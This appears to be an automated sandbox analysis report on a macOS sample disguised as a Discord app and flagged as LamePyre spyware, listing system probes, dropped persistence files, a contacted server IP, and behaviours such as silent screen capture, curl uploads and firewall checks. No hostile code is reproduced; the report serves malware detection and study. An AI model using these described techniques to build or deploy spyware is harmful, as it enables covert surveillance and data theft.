Source: /bin/sh (PID: 574)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 576)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 577)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 600)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 617)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 633)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 642)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 650)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 658)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 667)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 674)Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist fileShow sources
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 575)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 589)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 598)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 607)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 616)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 623)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 632)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 641)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 648)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 657)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 666)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 673)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 65585 Sample: Pe7niErK6B Startdate: 12/12/2018 Architecture: MAC Score: 76 72 37.1.221.204, 80, 8080 LEASEWEB-DE Ukraine 2->72 74 17.253.57.212, 49242, 80 APPLE-AUSTIN-AppleIncUS United States 2->74 10 xpcproxy Application Stub 2->10         started        12 xpcproxy .systemkeeper Python 2->12         started        14 xpcproxy .systemkeeper Python 2->14         started        16 12 other processes 2->16 signatures3 88 Detected TCP or UDP traffic on non-standard ports 72->88 process4 process5 18 bash 10->18         started        20 Python sh 12->20         started        22 Python sh 14->22         started        24 Python sh 16->24         started        26 Python sh 16->26         started        28 Python sh 16->28         started        30 8 other processes 16->30 process6 32 bash python Python 3 18->32         started        38 41 other processes 18->38 36 sh grep 20->36         started        40 2 other processes 20->40 42 3 other processes 22->42 44 3 other processes 24->44 46 3 other processes 26->46 48 3 other processes 28->48 50 21 other processes 30->50 file7 68 /Users/henry/Libra....systemkeeper.plist, XML 32->68 dropped 70 /Users/henry/.system/.systemkeeper, python 32->70 dropped 76 Detected macOS LamePyre spyware 32->76 52 Python sh 32->52         started        54 Python sh mkdir 32->54         started        57 Python sh mkdir 32->57         started        59 Python sh launchctl 32->59         started        78 Checks if the firewall "Little Snitch" is running 36->78 80 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 36->80 82 Uploads files by using the "curl" command and emulating a filled-in form 38->82 84 Explicitly creates screenshots silently (i.e. without playing sounds) 38->84 86 Captures screenshots with shell command 'screencapture' 38->86 signatures8 process9 signatures10 61 sh ps 52->61         started        64 sh grep 52->64         started        66 sh grep 52->66         started        90 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 54->90 process11 signatures12 92 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 61->92 94 Reads process information of other processes 61->94 96 Checks if the firewall "Little Snitch" is running 64->96

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.